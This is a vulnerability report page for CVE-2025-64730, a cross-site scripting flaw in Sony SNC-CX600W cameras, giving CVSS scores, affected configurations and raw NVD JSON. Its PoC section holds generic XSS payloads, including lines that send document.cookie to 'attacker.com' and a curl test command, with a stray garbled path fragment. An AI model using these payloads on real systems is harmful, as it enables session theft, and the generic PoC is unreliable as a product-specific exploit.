Security Vulnerability Report
CVE-2025-64730 CVSS 6.1 MEDIUM

CVE-2025-64730

Published: 2025-11-25 05:16:13
Last Modified: 2025-12-01 15:27:23

Description

Cross-site scripting vulnerability exists in SNC-CX600W all versions. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the product.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:sony:snc-cx600w_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sony:snc-cx600w:-:*:*:*:*:*:*:* - NOT VULNERABLE
Sony SNC-CX600W, all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-64730 XSS PoC for Sony SNC-CX600W -->
<!-- This PoC demonstrates a reflected XSS attack -->

<!-- Method 1: URL-based XSS injection -->
<script>alert(document.cookie)</script>

<!-- Method 2: Encoded XSS payload -->
<img src=x onerror="fetch('http://attacker.com/steal?cookie='+document.cookie)">

<!-- Method 3: DOM-based XSS -->
'><script>document.location='http://attacker.com/phish?data='+document.cookie</script>

<!-- Real attack scenario: -->
<!-- Attacker crafts a malicious URL like: -->
<!-- http://<camera-ip>/web一致/xxx?param=<script>malicious_code</script> -->
<!-- Then tricks authenticated user into clicking the link -->

<!-- Recommended test commands: -->
<!-- curl 'http://<target-ip>/path?param=<script>alert(1)</script>' -->
<!-- Check if script executes in browser context -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64730", "sourceIdentifier": "[email protected]", "published": "2025-11-25T05:16:12.560", "lastModified": "2025-12-01T15:27:22.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting vulnerability exists in SNC-CX600W all versions. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the product."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], 
"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.2, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sony:snc-cx600w_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "52A27136-5226-4C49-96C2-E49E8DC86BC6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sony:snc-cx600w:-:*:*:*:*:*:*:*", "matchCriteriaId": "D07C1884-C881-4A23-B345-5A588072C965"}]}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN75140384/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.sony.com/electronics/support/ip-cameras-fixed/snc-cx600w", "source": "[email protected]", "tags": ["Product"]}]}}